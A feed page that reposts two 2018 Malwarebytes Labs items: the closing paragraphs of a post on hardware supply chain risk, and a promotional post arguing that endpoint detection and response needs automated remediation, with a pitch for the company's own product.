Businesses may wish to conduct hardware security audits on newly-acquired equipment to check for suspicious behavior. IT departments should also consider rolling out updates and patches in staggered succession to monitor for flaws or undesirable effects, thus isolating these problems to a few machines rather than the entire company. And, of course, adopting early technologies should be off-limits for security-conscious enterprises as these products have not yet received the scrutiny of the security community.

How can consumers and businesses truly protect themselves, then? The real answer is “they can’t.” Consumers can never be 100 percent assured the devices and software they buy will be completely harmless.

Without the ability to analyze and reverse-engineer every single device and bit of code that is used, customers have few fail-safe methodologies to ensure their products are free of defect. They must simply research, use common sense, and trust that they’re aligning themselves with products and companies that take the privacy and security of their customers seriously.

Aligning with security best practices, doing due diligence, and conducting a cost/benefit analysis are all good suggestions to follow. But also in this case, maybe crossing your fingers and saying a prayer is just as viable a suggestion.

The post Bloomberg blunder highlights supply chain risks appeared first on Malwarebytes Labs.

Categories: Techie Feeds

When Endpoint Detection and Response (EDR) is not enough

Malwarebytes - Tue, 10/09/2018 - 15:00

As cybercriminals continue to validate the reality that no prevention-based security control is going to stop every threat every time, companies are expanding beyond prevention-only approaches and closing the gap with endpoint detection and response solutions.

But as we consider this strategy, one pressing question is: How big is the gap? If prevention security isn’t 100 percent effective, how effective is it? A popular perception among businesses is that prevention security is about 98 percent effective, with a mere 2 percent of threats slipping by. However, the reality is far worse.

Because our product is most often used for malware remediation on business endpoints, we have extensive telemetry on this gap, where current endpoint protection technologies are failing to keep organizations safe. Our data shows that current endpoint protection platform vendor software is approximately 40 percent effective, based on endpoints using Malwarebytes for cleanup. That means 60 percent of those endpoints were found to be harboring hidden threats—including Trojans, backdoors, and rootkits.

Framing up the size of the gap is important because it helps organizations prioritize the capabilities they need in their endpoint detection and response (EDR) solution—namely, automated and complete remediation.

Until recently, organizations have turned to EDR to gain greater visibility into what’s happening on endpoints. While helpful and important, visibility doesn’t provide a silver-bullet solution for fast and effective remediation. Incident response (IR) teams still face challenges when managing multiple platforms, chasing false alerts, and manually handling the remediation process.

Lack of visibility into, and quick remediation of, threats leads to long infection dwell times. In fact, according to IR teams interviewed for the 2017 SANS Incident Response Survey, 28 percent report the time from detection to remediation is between 6 and 24 hours. The picture is much more grim in the 2018 Verizon Data Breach Investigations Report, where more than 70 percent of organizations were compromised by a breach within minutes, but discovery of that breach took months for 60 percent of respondents. A further 30 percent took days to contain a breach after discovery, and a still solid 10 percent took additional months to get their breach under control.

In addition to dwell time, manual remediation itself is resource-intensive, often involving a lengthy re-imaging process for IR teams, and lots of lost productivity for employees—not to mention the tedious re-installation of end-user applications and customization of personal settings.

There’s a better way.

Breaches are inevitable, and the true size of the prevention gap is much bigger than many realize. As such, remediation capabilities are essential for today’s organizations. To truly close the gap and remediate hidden threats, the “response” portion of EDR solutions needs to go beyond alerting to actually fixing the endpoint.

And that’s what we aim to do with Malwarebytes Endpoint Protection and Response. Using a single, unified agent to deliver endpoint protection, detection, and response, our solution effectively alleviates expertise challenges and eliminates the resolution gap. Our product consists of three key components:

1. Prevent

Malwarebytes Endpoint Protection and Response uses a seven-layered, Multi-Vector Protection (MVP) approach, which includes both static and dynamic detection techniques, to seek out a wide range of threats delivered via different attack vectors.

2. Detect

Our solution provides continuous endpoint monitoring and visibility using machine learning anomaly detection combined with aggressive anomaly detection scoring, which is integrated with our cloud sandbox detonation.

3. Respond

Malwarebytes goes beyond alerting and actually fixes the problem with thorough remediation, and even rollback for ransomware infections. Our fast and effective response includes complete removal of infections and artifacts—all with minimized end-user impact.

The result is advanced protection capabilities plus EDR capabilities, packaged with not only visibility into threats but the ability to quickly remediate those threats and fix endpoints.

Malwarebytes isn’t like other security companies. With remediation in our DNA, we do everything in our power to stop attacks before they happen, but we never assume that cybercriminals won’t find a way. That’s why we’ve focused on being the best at finding and removing known and unknown threats.

Learn more about how to remediate threats with Malwarebytes Endpoint Protection and Response.

The post When Endpoint Detection and Response (EDR) is not enough appeared first on Malwarebytes Labs.

Categories: Techie Feeds
